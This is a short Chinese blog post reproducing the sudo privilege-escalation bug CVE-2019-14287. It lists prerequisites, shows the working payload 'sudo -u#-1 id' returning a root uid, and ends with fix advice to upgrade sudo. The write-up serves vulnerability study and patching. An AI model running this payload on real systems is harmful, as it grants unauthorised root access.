[漏洞复现]CVE-2019-14287 sudo提权漏洞
Posted mark-zh
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[漏洞复现]CVE-2019-14287 sudo提权漏洞相关的知识,希望对你有一定的参考价值。
漏洞描述
2019年10月14日,CVE官方发布了CVE-2019-14287的漏洞预警。通过特定payload,用户可提升至root权限。
利用前提
- sudo -v < 1.8.28
- 知道当前用户的密码
- 当前用户存在于sudo权限列表
漏洞复现
mark@mark-Pc:~$ id
uid=1000(mark) gid=1000(mark) 组=1000(mark),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
mark@mark-Pc:~$ sudo -u#-1 id
[sudo] mark 的密码:
uid=0(root) gid=1000(mark) 组=1000(mark)修复建议
- 升级sudo到1.8.28版本
- 做好sudo用户列表管理
以上是关于[漏洞复现]CVE-2019-14287 sudo提权漏洞的主要内容,如果未能解决你的问题,请参考以下文章
PJzhang:CVE-2019-14287 sudo权限绕过漏洞复现
(CVE-2019-14287)-linux sudo root 权限绕过漏洞复现